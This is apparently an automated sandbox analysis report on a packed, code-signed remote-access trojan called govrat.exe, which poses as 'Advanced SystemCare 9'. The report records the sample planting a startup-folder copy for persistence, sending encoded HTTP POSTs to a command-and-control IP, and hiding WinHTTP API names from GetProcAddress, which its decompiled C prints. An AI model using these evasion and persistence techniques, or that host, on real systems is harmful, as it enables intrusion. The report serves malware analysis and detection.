Source: C:\Users\user\Desktop\govrat.exe	API call chain: ExitProcess graph end node			graph_1-20536
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	API call chain: ExitProcess graph end node			graph_5-20089

Queries a list of all running drivers

Show sources

Source: C:\Users\user\Desktop\govrat.exe

System information queried: ModuleInformation

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Code function: 1_2_00965B62 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00965B62

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
22:26:22	API Interceptor	43x Sleep call for process: govrat.exe modified
22:26:40	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
22:26:41	API Interceptor	7x Sleep call for process: explorer.exe modified
22:26:47	API Interceptor	1x Sleep call for process: ASC.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Startup

System is w7x64native_hvm

govrat.exe (PID: 3676 cmdline: 'C:\Users\user\Desktop\govrat.exe' MD5: C0618556E9EF16B35B042BC29AEB9291)

explorer.exe (PID: 3948 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 1212 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

ASC.exe (PID: 3812 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe' MD5: 882FAC6DFE6E15AEA53D177BE51B7E26)

cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe
Process:	C:\Users\user\Desktop\govrat.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	6291472
Entropy (8bit):	7.996353658269883
Encrypted:	true
MD5:	882FAC6DFE6E15AEA53D177BE51B7E26
SHA1:	E8B5BF37D89A2921C0092353B0A7907FC00AF03D
SHA-256:	2A9FFF46C9EFF07F2360F6E08216A7BCA793C09A64C36D8F80CD9F8E91A288A9
SHA-512:	5B9FD1CBF214EA761EAA7929F105D97BB0172F8E4139511D2FB0E7109D2F375E1346A87C83C83193A88B34B02064C31D6EC1A14CE324701EDEE41190677686BE
Malicious:	false
Reputation:	low

\samr
Process:	C:\Users\user\Desktop\govrat.exe
File Type:	GLS_BINARY_LSB_FIRST
Size (bytes):	1014
Entropy (8bit):	4.131663370232929
Encrypted:	false
MD5:	D4D20EBCE40654F57B46AB722F3DBE83
SHA1:	93DF2D6CF35698290269969BD1948C2108EB3AD2
SHA-256:	C5D5D099BEF01A808BD9ECD517659ECD85A164280724603B0F6393A2AA3E1ED7
SHA-512:	A6956754D60EC704B9CB862D34CD5E2EA860EE3CE9781F318A81B8F6D30A444CD60DE95675AE52474D5D1DDEFFA88C0E470341FC1683CDD723923ACCB69677F2
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Flag	ASN	ASN Name	Malicious
192.243.101.124	United States		36454	TIP-NETWORKS-INC-TIPNetworksIncUS	false

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	7.880515336004999
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	govrat.exe
File size:	811992
MD5:	c0618556e9ef16b35b042bc29aeb9291
SHA1:	61eda4847845f49689ae582391cd1e6a216a8fa3
SHA256:	d485eaaed66a97822fd8b3317d2d61df50c1e1647ad37d6f42805b11eac37746
SHA512:	a69aa5bd6d38f19eeaed6e00b9e12eee05913d4e91f02373c46872cd5c3551d0dccec7607cc7d241001b0af8e4643aeef61632d9213060d0df60e44c9f3a8327
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m@.............k.......k.......k..................]....................k.......k.......k......Rich............PE..L....a.Y...

Static PE Info

General
Entrypoint:	0x5642ba
Entrypoint Section:	.vmp1
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x59DB618C [Mon Oct 09 11:46:20 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	370ca0394a7aeb5aeb72602950975e05

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	09/07/2017 01:00:00 10/07/2018 00:59:59
Subject Chain	CN=Ziber Ltd, O=Ziber Ltd, L=London, S=London, C=GB
Version:	3
Thumbprint:	1456D8A00D8BE963E2224D845B12E5084EA0B707
Serial:	5E15205F180442CC6C3C0F03E1A33D9F

Entrypoint Preview

Instruction
push 03595AFFh
call 0EC34A3Ch
mov byte ptr [eax+edi], dl
jmp 0EC357ACh
ret
and ebp, ecx
int3
rol dh, cl
pop esp
and ch, ah
xor eax, 8D77337Ah
shl byte ptr [ecx+27h], cl
pop esp
test dword ptr [edx+60AA2EDEh], edx
enter EB11h, E2h
cdq
les edi, fword ptr [ecx-7Ah]
dec edx
jnp 0ECC1520h
or dl, byte ptr [ebp-60h]
rol edi, 15h
jnl 0ECC14D5h
add edi, ebp
jc 159ACEF5h
loope 0ECC146Ah
cmp dword ptr [esi-71h], esp
leave
loopne 0ECC1476h
sbb dword ptr [eax-11h], ebx
mov fs, word ptr [esp-5Bh]
pop ecx
lds ebp, fword ptr [eax-14A609B6h]
aad B8h
and dword ptr [edx], esi
mov eax, 9D1DC735h
iretd
test dword ptr [ecx+2DE37F11h], A556B57Fh
and dword ptr [eax+eax*8], edx
jmp dword ptr [079B6DECh]
mov esi, dword ptr [58D39706h]
lea esp, dword ptr [ebp+4649E99Bh]
shl ebp, 1
stosd
xor dword ptr [eax], ebx
iretd
jnle 0ECC1499h
outsd
fmul dword ptr [esi-20ED2902h]
pop ss
sar dword ptr [edi+25h], 1
xchg bl, dl
sub dword ptr [edx], eax
push cs
cmpsb
in eax, dx
popfd
in al, dx
xchg byte ptr [edi], cl
sub dword ptr [ebp-56h], FFFFFFFFh
dec dword ptr [ebx+0800BFC7h]
add byte ptr [eax], al
cmp cl, bl
stc
sub edi, edx
shr edi, 05h
lea edi, dword ptr [edi+edx]
cmc

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x16b4cc	0x4f	.vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT	0x179eb0	0xdc	.vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17c000	0x12eba	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc5800	0xbd8	.vmp0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17b000	0x108	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17a020	0x40	.vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x141000	0x94	.vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ae10	0x0	False	0	ump; empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x5ddf	0x0	False	0	ump; empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x4b3c	0x0	False	0	ump; empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.vmp0	0x27000	0xa0edc	0x0	False	0	ump; empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.vmp1	0xc8000	0xb2080	0xb2200	False	0.958959703947	ump; data	7.94598915032	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x17b000	0x108	0x200	False	0.39453125	ump; data	2.46844131471	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x17c000	0x12eba	0x13000	False	0.597810444079	ump; data	6.54796071524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x17c280	0x8768	ump; PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x1849e8	0x3a48	ump; data	English	United States
RT_ICON	0x188430	0x25a8	ump; data	English	United States
RT_ICON	0x18a9d8	0x1a68	ump; data	English	United States
RT_ICON	0x18c440	0x10a8	ump; data	English	United States
RT_ICON	0x18d4e8	0x988	ump; data	English	United States
RT_ICON	0x18de70	0x6b8	ump; data	English	United States
RT_ICON	0x18e528	0x468	ump; GLS_BINARY_LSB_FIRST	English	United States
RT_GROUP_ICON	0x18e990	0x76	ump; MS Windows icon resource - 8 icons, 256-colors
RT_VERSION	0x18ea08	0x358	ump; data
RT_MANIFEST	0x18ed60	0x15a	ump; ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
gdiplus.dll	GdipGetImageEncoders
GDI32.dll	DeleteDC
KERNEL32.dll	GlobalMemoryStatusEx
USER32.dll	GetMessageW
ADVAPI32.dll	CryptGenRandom
SHELL32.dll	Shell_NotifyIconW
ole32.dll	CoSetProxyBlanket
OLEAUT32.dll	SysFreeString
KERNEL32.dll	LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA
ADVAPI32.dll	OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

Exports

Name	Ordinal	Address
IsProcessParent	1	0x40fa8a

Version Infos

Description	Data
LegalCopyright	Copyright(c) 2005-2016
FileVersion	9.3.0.1121
CompanyName
PrivateBuild	d5543e1965-81533df957-4f8b251e5d-84b718d211-42330f5c40-a942c47a31-fd2ba659a2-0bcec6dbdd-6f7c12de71-85bdf9
ProductName	Advanced SystemCare 9
ProductVersion	9.3.0.1121
FileDescription	Advanced SystemCare 9
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mrz 19, 2018 22:26:56.784701109 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:56.784749985 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:56.785006046 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:56.787794113 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:56.787812948 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:56.788217068 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:56.788227081 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:58.239176989 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:58.286287069 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:58.286310911 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:58.286849022 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:58.286861897 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:59.300407887 MEZ	80	49177	192.243.101.124	192.168.0.42
Mrz 19, 2018 22:26:59.300568104 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:59.300956011 MEZ	49177	80	192.168.0.42	192.243.101.124
Mrz 19, 2018 22:26:59.300981998 MEZ	80	49177	192.243.101.124	192.168.0.42

HTTP Request Dependency Graph

192.243.101.124

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.0.42	49177	192.243.101.124	80	C:\Users\user\Desktop\govrat.exe

Timestamp	kBytes transferred	Direction	Data
Mrz 19, 2018 22:26:56.787794113 MEZ	7	OUT	POST /index.html HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 Content-Length: 440 Host: 192.243.101.124
Mrz 19, 2018 22:26:56.788217068 MEZ	8	OUT	Data Raw: 6e 70 67 57 58 6e 58 45 71 33 46 70 2b 47 63 75 61 76 6f 41 6f 77 30 65 6c 61 31 69 35 6a 6a 52 31 43 52 42 77 52 51 66 66 55 7a 2f 6d 69 50 6f 6e 44 6e 39 4a 66 36 6f 68 71 6d 6c 70 6c 2b 41 4f 36 67 61 67 30 45 57 5a 37 4f 6c 58 30 6f 70 37 75 Data Ascii: npgWXnXEq3Fp+GcuavoAow0ela1i5jjR1CRBwRQffUz/miPonDn9Jf6ohqmlpl+AO6gag0EWZ7OlX0op7umK8l/r8Aj/SACh65mvXTNjJS+QDwscjjtZ/sc3tT1MHOFoA48A4Vah8OEo9Nm8DSAGZrpU9Da6QanrYzNH7QmB4dVxKI0uiLO7fVVexYAtese0JhOwGc7RmTkcHFZnpoNLRRVfgYnWs/oAE1dB0+JWRAm8lGZNMLT
Mrz 19, 2018 22:26:58.239176989 MEZ	9	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Mar 2018 21:26:48 GMT Content-Type: application/octet-stream Content-Length: 304 Connection: keep-alive Data Raw: 73 2f 45 76 54 58 55 70 31 46 37 42 77 42 31 46 70 51 50 37 46 47 44 31 32 55 6a 49 75 5a 49 71 34 6c 48 54 70 64 39 77 46 49 4b 30 35 6d 4b 2b 58 78 73 32 59 47 6f 64 43 4b 39 34 73 34 4a 54 36 55 66 51 2f 49 67 42 51 75 4f 36 71 55 48 58 6f 48 4e 58 57 30 47 6a 62 6f 61 58 4e 78 2f 48 4c 2b 47 4f 38 6b 42 77 59 73 37 6f 50 66 6f 6e 66 73 47 44 4d 53 64 42 5a 63 76 48 77 72 67 37 53 39 38 57 39 39 36 4d 31 2f 43 5a 31 2b 4f 63 68 4c 37 55 7a 6b 44 31 67 67 56 4a 32 68 32 52 44 33 41 6b 43 66 45 56 4b 31 2b 64 4c 49 53 57 33 47 57 34 45 39 77 6a 46 37 70 7a 54 55 44 75 75 2b 2b 46 38 4f 44 43 6e 2f 48 31 65 4c 4a 68 6b 4a 51 48 46 68 4a 30 71 79 49 69 59 48 63 4e 68 30 53 44 34 57 63 58 6a 48 63 58 6f 41 4d 59 67 63 71 45 68 6d 57 49 2b 67 39 4b 6b 62 70 36 79 6e 77 6c 53 77 44 76 71 63 36 42 76 61 72 6a 4c 59 4e 34 66 50 61 44 4c 56 76 66 37 4e 59 34 43 33 4e 41 6e 6c 4b 32 75 58 53 6c 6b 67 3d 3d Data Ascii: s/EvTXUp1F7BwB1FpQP7FGD12UjIuZIq4lHTpd9wFIK05mK+Xxs2YGodCK94s4JT6UfQ/IgBQuO6qUHXoHNXW0GjboaXNx/HL+GO8kBwYs7oPfonfsGDMSdBZcvHwrg7S98W996M1/CZ1+OchL7UzkD1ggVJ2h2RD3AkCfEVK1+dLISW3GW4E9wjF7pzTUDuu++F8ODCn/H1eLJhkJQHFhJ0qyIiYHcNh0SD4WcXjHcXoAMYgcqEhmWI+g9Kkbp6ynwlSwDvqc6BvarjLYN4fPaDLVvf7NY4C3NAnlK2uXSlkg==
Mrz 19, 2018 22:26:58.286287069 MEZ	9	OUT	POST /index.html HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 Content-Length: 32 Host: 192.243.101.124
Mrz 19, 2018 22:26:58.286849022 MEZ	9	OUT	Data Raw: d4 09 36 33 c9 4c 99 9f 57 7d e3 b2 c6 2c 8c a6 ca 30 39 7b 94 91 b1 4f fa 76 d5 f4 9b c5 f5 23 Data Ascii: 63LW},09{Ov#

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: govrat.exe PID: 3676 Parent PID: 3216

General

Start time:	22:26:18
Start date:	10/10/2017
Path:	C:\Users\user\Desktop\govrat.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\govrat.exe'
Imagebase:	0x950000
File size:	811992 bytes
MD5 hash:	C0618556E9EF16B35B042BC29AEB9291
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3948 Parent PID: 3188

General

Start time:	22:26:40
Start date:	10/10/2017
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Imagebase:	0x450000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1212 Parent PID: 752

General

Start time:	22:26:41
Start date:	10/10/2017
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0xff5e0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ASC.exe PID: 3812 Parent PID: 1212

General

Start time:	22:26:42
Start date:	10/10/2017
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Imagebase:	0x12c0000
File size:	6291472 bytes
MD5 hash:	882FAC6DFE6E15AEA53D177BE51B7E26
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: govrat.exe PID: 3676 Parent PID: 3216

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.5%
Total number of Nodes:	649
Total number of Limit Nodes:	35

Executed Functions

Function 00965B62, Relevance: 128.0, APIs: 13, Strings: 60, Instructions: 209
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00965B62(void* __ecx, _Unknown_base(*)()** __edi) {
				short _t134;
				short _t135;
				short _t136;
				short _t137;
				short _t138;
				short _t139;
				struct HINSTANCE__* _t142;
				void* _t143;
				_Unknown_base(*)()* _t144;
				_Unknown_base(*)()* _t146;
				_Unknown_base(*)()* _t148;
				_Unknown_base(*)()* _t150;
				_Unknown_base(*)()* _t152;
				_Unknown_base(*)()* _t154;
				_Unknown_base(*)()* _t156;
				_Unknown_base(*)()* _t158;
				_Unknown_base(*)()* _t160;
				_Unknown_base(*)()* _t162;
				_Unknown_base(*)()* _t164;
				_Unknown_base(*)()* _t166;
				_Unknown_base(*)()* _t168;
				intOrPtr* _t179;
				void* _t181;

				_t179 = _t181 - 0x78;
				_t134 = 0x57;
				 *((short*)(_t179 - 0xb4)) = _t134;
				_t135 = 0x69;
				 *((short*)(_t179 - 0xb2)) = _t135;
				_t136 = 0x6e;
				 *((short*)(_t179 - 0xb0)) = _t136;
				_t137 = 0x48;
				 *((short*)(_t179 - 0xae)) = _t137;
				_t138 = 0x74;
				 *((short*)(_t179 - 0xac)) = _t138;
				 *((short*)(_t179 - 0xaa)) = _t138;
				_t139 = 0x70;
				 *((short*)(_t179 - 0xa8)) = _t139;
				 *((short*)(_t179 - 0xa6)) = 0;
				_push(_t179 - 0xb4);
				_t142 = E009CCFF3(_t179 - 0xb4); // executed
				 *(_t179 + 0x74) = _t142;
				if(_t142 == 0) {
					L14:
					_t143 = 0;
				} else {
					 *(_t179 - 8) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 4)) = 0x53707474;
					 *_t179 = 0x52646e65;
					 *((intOrPtr*)(_t179 + 4)) = 0x65757165;
					 *((short*)(_t179 + 8)) = 0x7473;
					 *((char*)(_t179 + 0xa)) = 0;
					_t144 = GetProcAddress(_t142, _t179 - 8); // executed
					 *__edi = _t144;
					 *(_t179 - 0xa4) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0xa0)) = 0x47707474;
					 *((intOrPtr*)(_t179 - 0x9c)) = 0x45497465;
					 *((intOrPtr*)(_t179 - 0x98)) = 0x786f7250;
					 *((intOrPtr*)(_t179 - 0x94)) = 0x6e6f4379;
					 *((intOrPtr*)(_t179 - 0x90)) = 0x46676966;
					 *((intOrPtr*)(_t179 - 0x8c)) = 0x7543726f;
					 *((intOrPtr*)(_t179 - 0x88)) = 0x6e657272;
					 *((intOrPtr*)(_t179 - 0x84)) = 0x65735574;
					 *((short*)(_t179 - 0x80)) = 0x72;
					_t146 = GetProcAddress( *(_t179 + 0x74), _t179 - 0xa4); // executed
					 *(__edi + 4) = _t146;
					 *(_t179 + 0x34) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x38)) = 0x53707474;
					 *((intOrPtr*)(_t179 + 0x3c)) = 0x704f7465;
					 *((intOrPtr*)(_t179 + 0x40)) = 0x6e6f6974;
					 *((char*)(_t179 + 0x44)) = 0;
					_t148 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x34); // executed
					 *(__edi + 8) = _t148;
					 *(_t179 + 0x20) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x24)) = 0x53707474;
					 *((intOrPtr*)(_t179 + 0x28)) = 0x69547465;
					 *((intOrPtr*)(_t179 + 0x2c)) = 0x756f656d;
					 *((short*)(_t179 + 0x30)) = 0x7374;
					 *((char*)(_t179 + 0x32)) = 0;
					_t150 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x20); // executed
					 *(__edi + 0xc) = _t150;
					 *(_t179 - 0x60) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x5c)) = 0x52707474;
					 *((intOrPtr*)(_t179 - 0x58)) = 0x69656365;
					 *((intOrPtr*)(_t179 - 0x54)) = 0x65526576;
					 *((intOrPtr*)(_t179 - 0x50)) = 0x6e6f7073;
					 *((short*)(_t179 - 0x4c)) = 0x6573;
					 *((char*)(_t179 - 0x4a)) = 0;
					_t152 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x60); // executed
					 *(__edi + 0x10) = _t152;
					 *(_t179 + 0x58) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
					 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
					 *((short*)(_t179 + 0x64)) = 0x7463;
					 *((char*)(_t179 + 0x66)) = 0;
					_t154 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x58); // executed
					 *(__edi + 0x14) = _t154;
					 *(_t179 + 0x68) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x6c)) = 0x4f707474;
					 *((intOrPtr*)(_t179 + 0x70)) = 0x6e6570;
					_t156 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x68); // executed
					 *(__edi + 0x18) = _t156;
					 *(_t179 + 0xc) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x10)) = 0x4f707474;
					 *((intOrPtr*)(_t179 + 0x14)) = 0x526e6570;
					 *((intOrPtr*)(_t179 + 0x18)) = 0x65757165;
					 *((short*)(_t179 + 0x1c)) = 0x7473;
					 *((char*)(_t179 + 0x1e)) = 0;
					_t158 = GetProcAddress( *(_t179 + 0x74), _t179 + 0xc); // executed
					 *(__edi + 0x1c) = _t158;
					 *(_t179 - 0x48) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x44)) = 0x47707474;
					 *((intOrPtr*)(_t179 - 0x40)) = 0x72507465;
					 *((intOrPtr*)(_t179 - 0x3c)) = 0x4679786f;
					 *((intOrPtr*)(_t179 - 0x38)) = 0x7255726f;
					 *((short*)(_t179 - 0x34)) = 0x6c;
					_t160 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x48); // executed
					 *(__edi + 0x20) = _t160;
					 *(_t179 + 0x48) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x4c)) = 0x52707474;
					 *((intOrPtr*)(_t179 + 0x50)) = 0x44646165;
					 *((intOrPtr*)(_t179 + 0x54)) = 0x617461;
					_t162 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x48); // executed
					 *(__edi + 0x24) = _t162;
					 *(_t179 - 0x1c) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x18)) = 0x43707474;
					 *((intOrPtr*)(_t179 - 0x14)) = 0x65736f6c;
					 *((intOrPtr*)(_t179 - 0x10)) = 0x646e6148;
					 *((short*)(_t179 - 0xc)) = 0x656c;
					 *((char*)(_t179 - 0xa)) = 0;
					_t164 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x1c); // executed
					 *(__edi + 0x28) = _t164;
					 *(_t179 - 0x30) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x2c)) = 0x51707474;
					 *((intOrPtr*)(_t179 - 0x28)) = 0x79726575;
